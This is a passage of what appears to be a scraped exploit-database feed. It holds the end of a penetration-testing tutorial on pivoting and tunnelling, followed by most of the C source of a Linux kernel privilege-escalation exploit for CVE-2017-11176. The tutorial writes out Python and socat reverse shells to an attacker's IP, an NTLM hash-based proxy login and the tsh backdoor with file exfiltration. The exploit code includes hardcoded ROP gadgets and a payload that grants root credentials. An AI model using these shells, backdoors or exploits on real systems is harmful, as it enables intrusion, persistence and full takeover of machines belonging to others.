--ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM\\\r\n --username Alice --password [email\u00a0protected]\r\n \r\n\r\nOr if you have LM:NT hashes instead of password:\r\n\r\n python client.py --server-ip <rpivot_server_ip>\\\r\n --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM\\\r\n --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45\r\n \r\n\r\n#### Cntlm\r\n\r\n[Cntlm](http://cntlm.sourceforge.net/) is the tool of choice for running any non-proxy aware programs over NTLM-proxy. Basically this tool authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. This port bound does not require any authentication so you can use your tools directly (putty/ssh for example). It uses a config file for its operation. Here\u2019s a barebones config example to forward port 443 (this port is most likely to be allowed through the proxy):\r\n\r\n Username Alice\r\n Password [email\u00a0protected]\r\n Domain CONTOSO.COM\r\n Proxy 10.0.0.10:8080\r\n Tunnel 2222:<attackers_machine>:443\r\n \r\n\r\nRun it:\r\n\r\n`cntlm.exe -c config.conf`\r\n\r\nOr if you\u2019re on Linux:\r\n\r\n`./cntlm -c config.conf`\r\n\r\nNow, given you have ssh running on the remote host on port 443, you can launch ssh client (openssh/putty) and connect to local port 2222 to get access to the external machine.\r\n\r\n#### OpenVpn over HTTP proxy\r\n\r\n[OpenVpn](https://openvpn.net/index.php/open-source/documentation/howto.html) is huge so its configuration from the ground up is out of scope of this post. Just a quick mention - it also supports tunneling tcp connections over NTLM proxies. Add this line to your config file:\r\n\r\n`http-proxy <proxy_ip> 8080 <file_with_creds> ntlm`\r\n\r\nCredential file should contain username and password on separate lines. And, yes, you\u2019ll need root.\r\n\r\nMaking use of SOCKS with proxychains\r\n------------------------------------\r\n\r\nIf your program doesn\u2019t use raw sockets (nmap syn-scan, for example) then most probably you can use `proxychains` to force your program though the socks proxy. Edit proxy server in /etc/proxychains.conf:\r\n\r\n [ProxyList]\r\n # add proxy here ...\r\n # meanwile\r\n # defaults set to \"tor\"\r\n socks4 127.0.0.1 3128\r\n \r\n\r\nAll ready. Just prepend `proxychains` to you favorite pwn tool:\r\n\r\n`proxychains program_name`\r\n\r\nUsing impacket\u2019s psexec.py with proxychains:\r\n\r\n\r\n\r\nDNS with proxychains\r\n--------------------\r\n\r\nProxychains doesn\u2019t follow socks RFC when it comes to resolving hostnames. It intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. The things is, the DNS server is hardcoded to `4.2.2.2`. You might want to change the nameserver in order to resolve names on the internal network. A typical scenario is to change the nameserver to domain controller if you are pentesting windows environment. The setup is located at `/usr/lib/proxychains3/proxyresolv`:\r\n\r\n #!/bin/sh\r\n # This script is called by proxychains to resolve DNS names\r\n \r\n # DNS server used to resolve names\r\n DNS_SERVER=${PROXYRESOLV_DNS:-4.2.2.2} #change nameserver here\r\n \r\n \r\n if [ $# = 0 ] ; then\r\n echo \" usage:\"\r\n echo \" proxyresolv <hostname> \"\r\n exit\r\n fi\r\n \r\n\r\nBeutifying your web shell\r\n-------------------------\r\n\r\nThis section is not directly related to either pivoting or tunneling but instead describes a way of simplifying your work when developing attack into the internal network. Often, using a web-shell is rather tedious, especially when using programs that expect an interactive command interface. Most likely you will use some workarounds to performs simple tasks, such as passing password to sudo/su or just editing a file. I\u2019m not a big fan of torturing myself, so when there\u2019s an oportunity to escalate the web-shell to an interactive shell, I do so :) I won\u2019t cover stuff like launching semi-interactive shell using bash/perl/python etc. There\u2019s a ton of info on doing so. Check out this reverse shell cheat sheet - [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).\r\n\r\n### Python PTY shell\r\n\r\nAn upgrade from a regular semi-interactive shell. You can execute the following command in your existing shell:\r\n\r\n python -c 'import pty; pty.spawn(\"/bin/bash\")'\r\n \r\n\r\nOr initiate reverse connection:\r\n\r\n python -c 'import socket,subprocess,os;\\\r\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\\\r\n s.connect((\"<attackers_ip>\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\\\r\n os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\r\n \r\n\r\n### Socat\r\n\r\nNetcat on steroids! Seriously tho, go check this [tool\u2019s](http://www.dest-unreach.org/socat/) manual `man socat` and you\u2019d be amazed what you can do with this tool regarding tunneling. Among other things it can spawn a fully interactive shell, even better than the aforementioned python-pty. The downside is that you most probably will have to build/install this tool on the target server as it is not a default utility in most unix-like distributions.\r\n\r\n#### Bind shell\r\n\r\nSet listener:\r\n\r\n`socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane`\r\n\r\nConnect to the listener:\r\n\r\n``socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337``\r\n\r\n#### Reverse shell\r\n\r\nSet listener:\r\n\r\n``socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0``\r\n\r\nConnect to attacker\u2019s machine:\r\n\r\n socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane\r\n \r\n\r\n#### Terminal size\r\n\r\nBy default the terminal size is quite small, as you may notice when launching `top` command or editing files with a text editor. You can easily change this, use `stty -a` command to get the size of your regular teminal:\r\n\r\n $ stty -a\r\n speed 38400 baud; rows 57; columns 211; line = 0;\r\n \r\n\r\nApply desired size to your socat terminal:\r\n\r\n $ stty rows 57 cols 211\r\n \r\n\r\n### Tsh\r\n\r\n[Tsh](https://github.com/creaktive/tsh) is a small ssh-like backdoor with full-pty terminal and with capability of file transfer. This tool has very small footprint and is easily built on most unix-like systems. Start with editing tsh.h file:\r\n\r\n #ifndef _TSH_H\r\n #define _TSH_H\r\n \r\n char *secret = \"never say never say die\";\r\n \r\n #define SERVER_PORT 22\r\n short int server_port = SERVER_PORT;\r\n /*\r\n #define CONNECT_BACK_HOST \"localhost\"\r\n #define CONNECT_BACK_DELAY 30\r\n */\r\n #define GET_FILE 1\r\n #define PUT_FILE 2\r\n #define RUNSHELL 3\r\n \r\n #endif /* tsh.h */\r\n \r\n\r\nChange `secret`, specify `SERVER_PORT`. Uncomment and edit `CONNECT_BACK_HOST` and `CONNECT_BACK_DELAY` directives if you want backconnect. Run make:\r\n\r\n $ make linux_x64\r\n make\t\t\t\t\t\t\t\t\\\r\n \tLDFLAGS=\" -Xlinker --no-as-needed -lutil\"\t\\\r\n \tDEFS=\" -DLINUX\"\t\t\t\t\t\\\r\n \ttsh tshd\r\n make[1]: Entering directory '/tmp/tsh'\r\n gcc -O3 -W -Wall -DLINUX -c pel.c\r\n gcc -O3 -W -Wall -DLINUX -c aes.c\r\n gcc -O3 -W -Wall -DLINUX -c sha1.c\r\n gcc -O3 -W -Wall -DLINUX -c tsh.c\r\n gcc -Xlinker --no-as-needed -lutil -o tsh pel.o aes.o sha1.o tsh.o\r\n strip tsh\r\n gcc -O3 -W -Wall -DLINUX -c tshd.c\r\n gcc -Xlinker --no-as-needed -lutil -o tshd pel.o aes.o sha1.o tshd.o\r\n strip tshd\r\n make[1]: Leaving directory '/tmp/tsh'\r\n \r\n\r\nNow run `./tshd` on server. It will start listening on the specified port. You can connect to it via executing the following command:\r\n\r\n`./tsh host_ip`\r\n\r\nIf tsh was compiled with backconnect capability, the `tshd` daemon will try to connect back to the attacker\u2019s machine. To launch listener on attacker\u2019s side:\r\n\r\n $ ./tsh cb\r\n Waiting for the server to connect...\r\n \r\n\r\nTo transfer files with tsh:\r\n\r\n ./tsh host_ip get /etc/passwd .\r\n ./tsh host_ip put /bin/netcat /tmp", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45554/"}, {"lastseen": "2018-10-08T16:29:42", "description": "Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation. CVE-2017-11176. Local exploit for Linux platform", "published": "2018-10-02T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11176"], "modified": "2018-10-02T00:00:00", "id": "EDB-ID:45553", "href": "https://www.exploit-db.com/exploits/45553/", "sourceData": "/*\r\n * CVE-2017-11176: \"mq_notify: double sock_put()\" by LEXFO (2018).\r\n *\r\n * DISCLAIMER: The following code is for EDUCATIONAL purpose only. Do not\r\n * use it on a system without authorizations.\r\n *\r\n * WARNING: The exploit WILL NOT work on your target, it requires modifications!\r\n *\r\n * Compile with:\r\n *\r\n * gcc -fpic -O0 -std=c99 -Wall -pthread cve-2017-11176.c -o exploit\r\n *\r\n * For a complete explanation / analysis, please read the following series:\r\n *\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part1.html\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part2.html\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part3.html\r\n * - https://blog.lexfo.fr/cve-2017-11176-linux-kernel-exploitation-part4.html\r\n */\r\n\r\n#define _GNU_SOURCE\r\n#include <asm/types.h>\r\n#include <mqueue.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/un.h>\r\n#include <linux/netlink.h>\r\n#include <pthread.h>\r\n#include <errno.h>\r\n#include <stdbool.h>\r\n#include <sched.h>\r\n#include <stddef.h>\r\n#include <sys/mman.h>\r\n#include <stdint.h>\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\n#define NOTIFY_COOKIE_LEN (32)\r\n#define SOL_NETLINK (270) // from [include/linux/socket.h]\r\n\r\n#define NB_REALLOC_THREADS 200\r\n#define KMALLOC_TARGET 1024\r\n\r\n#define MAX_SOCK_PID_SPRAY 300\r\n\r\n#define MAGIC_NL_PID 0x11a5dcee\r\n#define MAGIC_NL_GROUPS 0x0\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\n// avoid library wrappers\r\n#define _mq_notify(mqdes, sevp) syscall(__NR_mq_notify, mqdes, sevp)\r\n#define _mmap(addr, length, prot, flags, fd, offset) syscall(__NR_mmap, addr, length, prot, flags, fd, offset)\r\n#define _munmap(addr, length) syscall(_NR_munmap, addr, length)\r\n#define _socket(domain, type, protocol) syscall(__NR_socket, domain, type, protocol)\r\n#define _setsockopt(sockfd, level, optname, optval, optlen) \\\r\n syscall(__NR_setsockopt, sockfd, level, optname, optval, optlen)\r\n#define _getsockopt(sockfd, level, optname, optval, optlen) \\\r\n syscall(__NR_getsockopt, sockfd, level, optname, optval, optlen)\r\n#define _dup(oldfd) syscall(__NR_dup, oldfd)\r\n#define _close(fd) syscall(__NR_close, fd)\r\n#define _sendmsg(sockfd, msg, flags) syscall(__NR_sendmsg, sockfd, msg, flags)\r\n#define _bind(sockfd, addr, addrlen) syscall(__NR_bind, sockfd, addr, addrlen)\r\n#define _getpid() syscall(__NR_getpid)\r\n#define _gettid() syscall(__NR_gettid)\r\n#define _sched_setaffinity(pid, cpusetsize, mask) \\\r\n syscall(__NR_sched_setaffinity, pid, cpusetsize, mask)\r\n#define _open(pathname, flags) syscall(__NR_open, pathname, flags)\r\n#define _read(fd, buf, count) syscall(__NR_read, fd, buf, count)\r\n#define _getsockname(sockfd, addr, addrlen) syscall(__NR_getsockname, sockfd, addr, addrlen)\r\n#define _connect(sockfd, addr, addrlen) syscall(__NR_connect, sockfd, addr, addrlen)\r\n#define _sched_yield() syscall(__NR_sched_yield)\r\n#define _lseek(fd, offset, whence) syscall(__NR_lseek, fd, offset, whence)\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\n#define PRESS_KEY() \\\r\n do { printf(\"[ ] press key to continue...\\n\"); getchar(); } while(0)\r\n\r\n#define BUILD_BUG_ON(cond) ((void)sizeof(char[1 - 2 * !!(cond)]))\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\n// target specific offset\r\n#define NLK_PID_OFFSET 0x288\r\n#define NLK_GROUPS_OFFSET 0x2a0\r\n#define NLK_WAIT_OFFSET 0x2b0\r\n#define WQ_HEAD_TASK_LIST_OFFSET 0x8\r\n#define WQ_ELMT_FUNC_OFFSET 0x10\r\n#define WQ_ELMT_TASK_LIST_OFFSET 0x18\r\n#define TASK_STRUCT_FILES_OFFSET 0x770\r\n#define FILES_STRUCT_FDT_OFFSET 0x8\r\n#define FDT_FD_OFFSET 0x8\r\n#define FILE_STRUCT_PRIVATE_DATA_OFFSET 0xa8\r\n#define SOCKET_SK_OFFSET 0x38\r\n\r\n// kernel function symbols\r\n#define NL_PID_HASHFN ((void*) 0xffffffff814b6da0)\r\n#define NETLINK_TABLE_GRAB ((void*) 0xffffffff814b7ea0)\r\n#define NETLINK_TABLE_UNGRAB ((void*) 0xffffffff814b73e0)\r\n#define COMMIT_CREDS ((void*) 0xffffffff810b8ee0)\r\n#define PREPARE_KERNEL_CRED ((void*) 0xffffffff810b90c0)\r\n#define NL_TABLE_ADDR ((void*) 0xffffffff824528c0)\r\n\r\n// gadgets in [_text; _etext]\r\n#define XCHG_EAX_ESP_ADDR ((uint64_t) 0xffffffff8107b6b8)\r\n#define MOV_PTR_RDI_MIN4_EAX_ADDR ((uint64_t) 0xffffffff811513b3)\r\n#define POP_RDI_ADDR ((uint64_t) 0xffffffff8103b81d)\r\n#define MOV_RAX_RBP_ADDR ((uint64_t) 0xffffffff813606d4)\r\n#define SHR_RAX_16_ADDR ((uint64_t) 0xffffffff810621ff)\r\n#define POP_RBP_ADDR ((uint64_t) 0xffffffff811b97bf)\r\n#define MOV_RAX_CR4_LEAVE_ADDR ((uint64_t) 0xffffffff81003009)\r\n#define MOV_CR4_RDI_LEAVE_ADDR ((uint64_t) 0xffffffff8100328d)\r\n#define AND_RAX_RDX_ADDR ((uint64_t) 0xffffffff8130c249)\r\n#define MOV_EDI_EAX_ADDR ((uint64_t) 0xffffffff814f118b)\r\n#define MOV_EDX_EDI_ADDR ((uint64_t) 0xffffffff8139ca54)\r\n#define POP_RCX_ADDR ((uint64_t) 0xffffffff81004abc)\r\n#define JMP_RCX_ADDR ((uint64_t) 0xffffffff8103357c)\r\n\r\n#define THREAD_SIZE (4096 << 2)\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstruct realloc_thread_arg\r\n{\r\n pthread_t tid;\r\n int recv_fd;\r\n int send_fd;\r\n struct sockaddr_un addr;\r\n};\r\n\r\nstruct unblock_thread_arg\r\n{\r\n int sock_fd;\r\n int unblock_fd;\r\n bool is_ready; // we can use pthread barrier instead\r\n};\r\n\r\nstruct sock_pid\r\n{\r\n int sock_fd;\r\n uint32_t pid;\r\n};\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstruct hlist_node {\r\n struct hlist_node *next, **pprev;\r\n};\r\n\r\nstruct hlist_head {\r\n struct hlist_node *first;\r\n};\r\n\r\nstruct nl_pid_hash {\r\n struct hlist_head* table;\r\n uint64_t rehash_time;\r\n uint32_t mask;\r\n uint32_t shift;\r\n uint32_t entries;\r\n uint32_t max_shift;\r\n uint32_t rnd;\r\n};\r\n\r\nstruct netlink_table {\r\n struct nl_pid_hash hash;\r\n void* mc_list;\r\n void* listeners;\r\n uint32_t nl_nonroot;\r\n uint32_t groups;\r\n void* cb_mutex;\r\n void* module;\r\n uint32_t registered;\r\n};\r\n\r\nstruct list_head\r\n{\r\n struct list_head *next, *prev;\r\n};\r\n\r\nstruct wait_queue_head\r\n{\r\n int slock;\r\n struct list_head task_list;\r\n};\r\n\r\ntypedef int (*wait_queue_func_t)(void *wait, unsigned mode, int flags, void *key);\r\n\r\nstruct wait_queue\r\n{\r\n unsigned int flags;\r\n#define WQ_FLAG_EXCLUSIVE 0x01\r\n void *private;\r\n wait_queue_func_t func;\r\n struct list_head task_list;\r\n};\r\n\r\nstruct socket {\r\n char pad[SOCKET_SK_OFFSET];\r\n void *sk;\r\n};\r\n\r\nstruct file {\r\n char pad[FILE_STRUCT_PRIVATE_DATA_OFFSET];\r\n void *private_data;\r\n};\r\n\r\nstruct fdtable {\r\n char pad[FDT_FD_OFFSET];\r\n struct file **fd;\r\n};\r\n\r\nstruct files_struct {\r\n char pad[FILES_STRUCT_FDT_OFFSET];\r\n struct fdtable *fdt;\r\n};\r\n\r\nstruct task_struct {\r\n char pad[TASK_STRUCT_FILES_OFFSET];\r\n struct files_struct *files;\r\n};\r\n\r\nstruct thread_info {\r\n\tstruct task_struct\t*task;\r\n char pad[0];\r\n};\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\ntypedef void (*netlink_table_grab_func)(void);\r\ntypedef void (*netlink_table_ungrab_func)(void);\r\ntypedef struct hlist_head* (*nl_pid_hashfn_func)(struct nl_pid_hash *hash, uint32_t pid);\r\ntypedef int (*commit_creds_func)(void *new);\r\ntypedef void* (*prepare_kernel_cred_func)(void *daemon);\r\n\r\n#define netlink_table_grab() \\\r\n (((netlink_table_grab_func)(NETLINK_TABLE_GRAB))())\r\n#define netlink_table_ungrab() \\\r\n (((netlink_table_ungrab_func)(NETLINK_TABLE_UNGRAB))())\r\n#define nl_pid_hashfn(hash, pid) \\\r\n (((nl_pid_hashfn_func)(NL_PID_HASHFN))(hash, pid))\r\n#define commit_creds(cred) \\\r\n (((commit_creds_func)(COMMIT_CREDS))(cred))\r\n#define prepare_kernel_cred(daemon) \\\r\n (((prepare_kernel_cred_func)(PREPARE_KERNEL_CRED))(daemon))\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic volatile size_t g_nb_realloc_thread_ready = 0;\r\nstatic volatile size_t g_realloc_now = 0;\r\nstatic volatile char g_realloc_data[KMALLOC_TARGET];\r\n\r\nstatic volatile struct list_head g_fake_next_elt;\r\nstatic volatile struct wait_queue *g_uland_wq_elt;\r\nstatic volatile char *g_fake_stack;\r\n\r\nstatic volatile uint64_t saved_esp;\r\nstatic volatile uint64_t saved_rbp_lo;\r\nstatic volatile uint64_t saved_rbp_hi;\r\nstatic volatile uint64_t restored_rbp;\r\nstatic volatile uint64_t restored_rsp;\r\n\r\nstatic struct sock_pid g_target;\r\nstatic struct sock_pid g_guard;\r\nstatic int unblock_fd = 1;\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\n#define get_thread_info(thread_stack_ptr) \\\r\n ((struct thread_info*) (thread_stack_ptr & ~(THREAD_SIZE - 1)))\r\n\r\n#define get_current(thread_stack_ptr) \\\r\n ((struct task_struct*) (get_thread_info(thread_stack_ptr)->task))\r\n\r\nstatic void payload(void)\r\n{\r\n struct task_struct *current = get_current(restored_rsp);\r\n struct socket *sock = current->files->fdt->fd[unblock_fd]->private_data;\r\n void *sk;\r\n\r\n sk = sock->sk; // keep it for list walking\r\n sock->sk = NULL; // fix the 'sk' dangling pointer\r\n\r\n // lock all hash tables\r\n netlink_table_grab();\r\n\r\n // retrieve NETLINK_USERSOCK's hash table\r\n struct netlink_table *nl_table = * (struct netlink_table**)NL_TABLE_ADDR; // deref it!\r\n struct nl_pid_hash *hash = &(nl_table[NETLINK_USERSOCK].hash);\r\n\r\n // retrieve the bucket list\r\n struct hlist_head *bucket = nl_pid_hashfn(hash, g_target.pid);\r\n\r\n // walk the bucket list\r\n struct hlist_node *cur;\r\n struct hlist_node **pprev = &bucket->first;\r\n for (cur = bucket->first; cur; pprev = &cur->next, cur = cur->next)\r\n {\r\n // is this our target ?\r\n if (cur == (struct hlist_node*)sk)\r\n {\r\n // fix the 'next' and 'pprev' field\r\n if (cur->next == (struct hlist_node*)KMALLOC_TARGET) // 'cmsg_len' value (reallocation)\r\n cur->next = NULL; // first scenario: was the last element in the list\r\n cur->pprev = pprev;\r\n\r\n // __hlist_del() operation (dangling pointers fix up)\r\n *(cur->pprev) = cur->next;\r\n if (cur->next)\r\n cur->next->pprev = pprev;\r\n\r\n hash->entries--; // make it clean\r\n\r\n // stop walking\r\n break;\r\n }\r\n }\r\n\r\n // release the lock\r\n netlink_table_ungrab();\r\n\r\n // privilege (de-)escalation\r\n commit_creds(prepare_kernel_cred(NULL));\r\n}\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\n/*\r\n * Migrates the current thread to CPU#0.\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n\r\nstatic int migrate_to_cpu0(void)\r\n{\r\n cpu_set_t set;\r\n\r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n\r\n if (_sched_setaffinity(_getpid(), sizeof(set), &set) == -1)\r\n {\r\n perror(\"[-] sched_setaffinity\");\r\n return -1;\r\n }\r\n\r\n return 0;\r\n}\r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\n/*\r\n * Creates a NETLINK_USERSOCK netlink socket, binds it and retrieves its pid.\r\n * Argument @sp must not be NULL.\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n\r\nstatic int create_netlink_candidate(struct sock_pid *sp)\r\n{\r\n struct sockaddr_nl addr = {\r\n .nl_family = AF_NETLINK,\r\n .nl_pad = 0,\r\n .nl_pid = 0, // zero to use netlink_autobind()\r\n .nl_groups = 0 // no groups\r\n\r\n };\r\n size_t addr_len = sizeof(addr);\r\n\r\n if ((sp->sock_fd = _socket(AF_NETLINK, SOCK_DGRAM, NETLINK_USERSOCK)) == -1)\r\n {\r\n perror(\"[-] socket\");\r\n goto fail;\r\n }\r\n\r\n if (_bind(sp->sock_fd, (struct sockaddr*)&addr, sizeof(addr)) == -1)\r\n {\r\n perror(\"[-] bind\");\r\n goto fail_close;\r\n }\r\n\r\n if (_getsockname(sp->sock_fd, &addr, &addr_len))\r\n {\r\n perror(\"[-] getsockname\");\r\n goto fail_close;\r\n }\r\n \r\n sp->pid = addr.nl_pid;\r\n\r\n return 0;\r\n\r\nfail_close:\r\n close(sp->sock_fd);\r\nfail:\r\n sp->sock_fd = -1;\r\n sp->pid = -1;\r\n return -1;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\n/*\r\n * Parses @proto hash table from '/proc/net/netlink' and allocates/fills the\r\n * @pids array. The total numbers of pids matched is stored in @nb_pids.\r\n *\r\n * A typical output looks like:\r\n *\r\n * $ cat /proc/net/netlink\r\n * sk Eth Pid Groups Rmem Wmem Dump Locks Drops\r\n * ffff88001eb47800 0 0 00000000 0 0 (null) 2 0 \r\n * ffff88001fa65800 6 0 00000000 0 0 (null) 2 0 \r\n *\r\n * Every line is printed from netlink_seq_show():\r\n *\r\n * seq_printf(seq, \"%p %-3d %-6d %08x %-8d %-8d %p %-8d %-8d\\n\"\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n\r\nstatic int parse_proc_net_netlink(int **pids, size_t *nb_pids, uint32_t proto)\r\n{\r\n int proc_fd;\r\n char buf[4096];\r\n int ret;\r\n char *ptr;\r\n char *eol_token;\r\n size_t nb_bytes_read = 0;\r\n size_t tot_pids = 1024;\r\n\r\n *pids = NULL;\r\n *nb_pids = 0;\r\n\r\n if ((*pids = calloc(tot_pids, sizeof(**pids))) == NULL)\r\n {\r\n perror(\"[-] not enough memory\");\r\n goto fail;\r\n }\r\n \r\n memset(buf, 0, sizeof(buf));\r\n if ((proc_fd = _open(\"/proc/net/netlink\", O_RDONLY)) < 0)\r\n {\r\n perror(\"[-] open\");\r\n goto fail;\r\n }\r\n\r\nread_next_block:\r\n if ((ret = _read(proc_fd, buf, sizeof(buf))) < 0)\r\n {\r\n perror(\"[-] read\");\r\n goto fail_close;\r\n }\r\n else if (ret == 0) // no more line to read\r\n {\r\n goto parsing_complete;\r\n }\r\n\r\n ptr = buf;\r\n\r\n if (strstr(ptr, \"sk\") != NULL) // this is the first line\r\n { \r\n if ((eol_token = strstr(ptr, \"\\n\")) == NULL)\r\n {\r\n // XXX: we don't handle this case, we can't even read one line...\r\n printf(\"[-] can't find end of first line\\n\");\r\n goto fail_close;\r\n }\r\n nb_bytes_read += eol_token - ptr + 1;\r\n ptr = eol_token + 1; // skip the first line\r\n }\r\n\r\nparse_next_line:\r\n // this is a \"normal\" line\r\n if ((eol_token = strstr(ptr, \"\\n\")) == NULL) // current line is incomplete\r\n {\r\n if (_lseek(proc_fd, nb_bytes_read, SEEK_SET) == -1)\r\n {\r\n perror(\"[-] lseek\");\r\n goto fail_close;\r\n }\r\n goto read_next_block;\r\n }\r\n else\r\n {\r\n void *cur_addr;\r\n int cur_proto;\r\n int cur_pid;\r\n\r\n sscanf(ptr, \"%p %d %d\", &cur_addr, &cur_proto, &cur_pid);\r\n\r\n if (cur_proto == proto)\r\n {\r\n if (*nb_pids >= tot_pids) // current array is not big enough, make it grow\r\n {\r\n tot_pids *= 2;\r\n if ((*pids = realloc(*pids, tot_pids * sizeof(int))) == NULL)\r\n {\r\n printf(\"[-] not enough memory\\n\");\r\n goto fail_close;\r\n }\r\n }\r\n\r\n *(*pids + *nb_pids) = cur_pid;\r\n *nb_pids = *nb_pids + 1;\r\n }\r\n\r\n nb_bytes_read += eol_token - ptr + 1;\r\n ptr = eol_token + 1;\r\n goto parse_next_line;\r\n }\r\n\r\nparsing_complete:\r\n close(proc_fd);\r\n return 0;\r\n\r\nfail_close:\r\n close(proc_fd);\r\nfail:\r\n if (*pids != NULL)\r\n free(*pids);\r\n *nb_pids = 0;\r\n return -1;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\n/*\r\n * Prepare multiple netlink sockets and search \"adjacent\" ones. Arguments\r\n * @target and @guard must not be NULL.\r\n *\r\n * Returns 0 on success, -1 on error.\r\n */\r\n\r\nstatic int find_netlink_candidates(struct sock_pid *target, struct sock_pid *guard)\r\n{\r\n struct sock_pid candidates[MAX_SOCK_PID_SPRAY];\r\n int *pids = NULL;\r\n size_t nb_pids;\r\n int i, j;\r\n int nb_owned;\r\n int ret = -1;\r\n\r\n target->sock_fd = -1;\r\n guard->sock_fd = -1;\r\n\r\n // allocate a bunch of netlink sockets\r\n for (i = 0; i < MAX_SOCK_PID_SPRAY; ++i)\r\n {\r\n if (create_netlink_candidate(&candidates[i]))\r\n { \r\n printf(\"[-] failed to create a new candidate\\n\");\r\n goto release_candidates;\r\n }\r\n }\r\n printf(\"[+] %d candidates created\\n\", MAX_SOCK_PID_SPRAY);\r\n\r\n if (parse_proc_net_netlink(&pids, &nb_pids, NETLINK_USERSOCK))\r\n {\r\n printf(\"[-] failed to parse '/proc/net/netlink'\\n\");\r\n goto release_pids;\r\n }\r\n printf(\"[+] parsing '/proc/net/netlink' complete\\n\");\r\n\r\n // find two consecutives pid that we own (slow algorithm O(N*M))\r\n i = nb_pids;\r\n while (--i > 0)\r\n {\r\n guard->pid = pids[i];\r\n target->pid = pids[i - 1];\r\n nb_owned = 0;\r\n\r\n // the list is not ordered by pid, so we do a full walking\r\n for (j = 0; j < MAX_SOCK_PID_SPRAY; ++j) \r\n {\r\n if (candidates[j].pid == guard->pid)\r\n {\r\n guard->sock_fd = candidates[j].sock_fd;\r\n nb_owned++;\r\n }\r\n else if (candidates[j].pid == target->pid)\r\n {\r\n target->sock_fd = candidates[j].sock_fd;\r\n nb_owned++;\r\n }\r\n\r\n if (nb_owned == 2)\r\n goto found;\r\n }\r\n\r\n // reset sock_fd to release them\r\n guard->sock_fd = -1;\r\n target->sock_fd = -1;\r\n }\r\n\r\n // we didn't found any valid candidates, release and quit\r\n goto release_pids;\r\n\r\nfound:\r\n printf(\"[+] adjacent candidates found!\\n\");\r\n ret = 0; // we succeed\r\n\r\nrelease_pids:\r\n i = MAX_SOCK_PID_SPRAY; // reset the candidate counter for release\r\n if (pids != NULL)\r\n free(pids);\r\n\r\nrelease_candidates:\r\n while (--i >= 0)\r\n {\r\n // do not release the target/guard sockets\r\n if ((candidates[i].sock_fd != target->sock_fd) &&\r\n (candidates[i].sock_fd != guard->sock_fd))\r\n {\r\n close(candidates[i].sock_fd);\r\n }\r\n }\r\n\r\n return ret;\r\n} \r\n\r\n// ============================================================================\r\n// ----------------------------------------------------------------------------\r\n// ============================================================================\r\n\r\nstatic void* unblock_thread(void *arg)\r\n{\r\n struct unblock_thread_arg *uta = (struct unblock_thread_arg*) arg;\r\n int val = 3535; // need to be different than zero\r\n\r\n // notify the main thread that the unblock thread has been created. It *must*\r\n // directly call mq_notify().\r\n uta->is_ready = true; \r\n\r\n sleep(5); // gives some time for the main thread to block\r\n\r\n printf(\"[ ][unblock] closing %d fd\\n\", uta->sock_fd);\r\n _close(uta->sock_fd);\r\n\r\n printf(\"[ ][unblock] unblocking now\\n\");\r\n if (_setsockopt(uta->unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &val, sizeof(val)))\r\n perror(\"[+] setsockopt\");\r\n return NULL;\r\n}\r\n\r\n// ----------------------------------------------------------------------------\r\n\r\nstatic int decrease_sock_refcounter(int sock_fd, int unblock_fd)\r\n{\r\n pthread_t tid;\r\n struct sigevent sigev;\r\n struct unblock_thread_arg uta;\r\n char sival_buffer[NOTIFY_COOKIE_LEN];\r\n\r\n // initialize the unblock thread arguments\r\n uta.sock_fd = sock_fd;\r\n uta.unblock_fd = unblock_fd;\r\n uta.is_ready = false;\r\n\r\n // initialize the sigevent structure\r\n memset(&sigev, 0, sizeof(sigev));\r\n sigev.sigev_notify = SIGEV_THREAD;\r\n sigev.sigev_value.sival_ptr = sival_buffer;\r\n sigev.sigev_signo = uta.sock_fd;\r\n\r\n 